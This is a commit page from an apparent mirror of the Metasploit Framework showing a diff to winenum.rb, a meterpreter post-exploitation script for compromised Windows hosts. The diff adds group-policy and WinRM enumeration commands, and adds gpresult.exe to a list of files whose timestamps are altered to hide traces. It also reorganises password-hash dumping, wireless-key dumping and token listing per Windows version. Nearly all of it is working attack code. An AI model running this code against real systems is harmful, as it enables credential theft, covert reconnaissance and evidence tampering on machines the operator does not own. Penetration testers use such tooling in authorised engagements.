infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated winenum frmo Carlos Perez 

git-svn-id: file:///home/svn/framework3/trunk@6574 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-05-22 02:33:33 +00:00
parent 99afc981d2
commit 7ef884eba7
1 changed files with 28 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
scripts/meterpreter/winenum.rb
View File

@ -48,11 +48,14 @@ commands = [
'net view /domain', 'net view /domain',
'netsh firewall show config', 'netsh firewall show config',
'tasklist /svc', 'tasklist /svc',
'tasklist /m' 'tasklist /m',
'gpresult /SCOPE COMPUTER /Z',
'gpresult /SCOPE USER /Z'
] ]
# Windows 2008 Commands # Windows 2008 Commands
win2k8cmd = [ win2k8cmd = [
'oclist', 'servermanagercmd.exe -q',
'cscript /nologo winrm get winrm/config',
] ]
# Commands wich MACE will be changed # Commands wich MACE will be changed
cmdstomp = [ cmdstomp = [
@ -66,6 +69,7 @@ cmdstomp = [
'makecab.exe', 'makecab.exe',
'tasklist.exe', 'tasklist.exe',
'wbem\\wmic.exe', 'wbem\\wmic.exe',
'gpresult.exe'
] ]
# WMIC Commands that will be executed on the Target # WMIC Commands that will be executed on the Target
wmic = [ wmic = [
@ -97,6 +101,8 @@ vstwlancmd = [
nonwin2kcmd = [ nonwin2kcmd = [
'netsh firewall show config', 'netsh firewall show config',
'tasklist /svc', 'tasklist /svc',
'gpresult /SCOPE COMPUTER /Z',
'gpresult /SCOPE USER /Z',
'prnport -l', 'prnport -l',
'prnmngr -g', 'prnmngr -g',
'tasklist.exe', 'tasklist.exe',
@ -106,6 +112,7 @@ nonwin2kcmd = [
# Executables not pressent in Windows 2000 # Executables not pressent in Windows 2000
nowin2kexe = [ nowin2kexe = [
'netsh.exe', 'netsh.exe',
'gpresult.exe',
'tasklist.exe', 'tasklist.exe',
'wbem\\wmic.exe', 'wbem\\wmic.exe',
] ]
@ -174,6 +181,7 @@ def list_exec(session,cmdlst)
tmpout = "" tmpout = ""
cmdout = "" cmdout = ""
r='' r=''
session.response_timeout=120
cmdlst.each do |cmd| cmdlst.each do |cmd|
begin begin
print_status "\trunning command #{cmd}" print_status "\trunning command #{cmd}"
@ -202,6 +210,7 @@ def wmicexec(session,wmiccmds= nil)
windr = '' windr = ''
tmpout = '' tmpout = ''
windrtmp = "" windrtmp = ""
session.response_timeout=120
begin begin
tmp = session.fs.file.expand_path("%TEMP%") tmp = session.fs.file.expand_path("%TEMP%")
wmicfl = tmp + "\\wmictmp.txt" wmicfl = tmp + "\\wmictmp.txt"
@ -478,7 +487,6 @@ def dumpwlankeys(session,pathoflogs,filename)
print_status("\tCompressing key into cab file for faster download") print_status("\tCompressing key into cab file for faster download")
r = session.sys.process.execute("cmd.exe /c makecab #{windir}\\wlan#{filename}.reg #{windir}\\wlan#{filename}.cab", nil, {'Hidden' => 'true','Channelized' => true}) r = session.sys.process.execute("cmd.exe /c makecab #{windir}\\wlan#{filename}.reg #{windir}\\wlan#{filename}.cab", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read) while(d = r.channel.read)
puts d
garbage << d garbage << d
end end
r.channel.close r.channel.close
@ -498,7 +506,6 @@ def dumpwlankeys(session,pathoflogs,filename)
end end
#Deleting left over files #Deleting left over files
print_status("\tDeleting left over files") print_status("\tDeleting left over files")
puts "cmd.exe /c del #{windir}\\wlan*"
#session.sys.process.execute("cmd.exe /c del #{windir}\\wlan*", nil, {'Hidden' => 'true'}) #session.sys.process.execute("cmd.exe /c del #{windir}\\wlan*", nil, {'Hidden' => 'true'})
end end
@ -612,24 +619,37 @@ if helpopt != 1
filewrt(dest,wmicexec(session,wmic)) filewrt(dest,wmicexec(session,wmic))
filewrt(dest,findprogs(session)) filewrt(dest,findprogs(session))
dumpwlankeys(session,logs,filenameinfo) dumpwlankeys(session,logs,filenameinfo)
filewrt(dest,gethash(session))
elsif trgtos =~ /(Windows .NET)/ elsif trgtos =~ /(Windows .NET)/
filewrt(dest,list_exec(session,commands)) filewrt(dest,list_exec(session,commands))
filewrt(dest,wmicexec(session,wmic)) filewrt(dest,wmicexec(session,wmic))
filewrt(dest,findprogs(session)) filewrt(dest,findprogs(session))
filewrt(dest,gethash(session))
elsif trgtos =~ /(Windows 2008)/ elsif trgtos =~ /(Windows 2008)/
filewrt(dest,list_exec(session,commands)) filewrt(dest,list_exec(session,commands + win2k8cmd))
filewrt(dest,wmicexec(session,wmic)) #filewrt(dest,wmicexec(session,wmic))
filewrt(dest,findprogs(session)) #filewrt(dest,findprogs(session))
if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.")
else
filewrt(dest,gethash(session))
end
elsif trgtos =~ /(Windows Vista)/ elsif trgtos =~ /(Windows Vista)/
filewrt(dest,list_exec(session,commands + vstwlancmd)) filewrt(dest,list_exec(session,commands + vstwlancmd))
filewrt(dest,wmicexec(session,wmic)) filewrt(dest,wmicexec(session,wmic))
filewrt(dest,findprogs(session)) filewrt(dest,findprogs(session))
dumpwlankeys(session,logs,filenameinfo) dumpwlankeys(session,logs,filenameinfo)
if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista if not System.")
else
filewrt(dest,gethash(session))
end
elsif trgtos =~ /(Windows 2000)/ elsif trgtos =~ /(Windows 2000)/
filewrt(dest,list_exec(session,commands - nonwin2kcmd)) filewrt(dest,list_exec(session,commands - nonwin2kcmd))
filewrt(dest,gethash(session))
end end
filewrt(dest,gethash(session)) #filewrt(dest,gethash(session))
filewrt(dest,listtokens(session)) filewrt(dest,listtokens(session))
if (rd != nil) if (rd != nil)
regdump(session,logs,filenameinfo) regdump(session,logs,filenameinfo)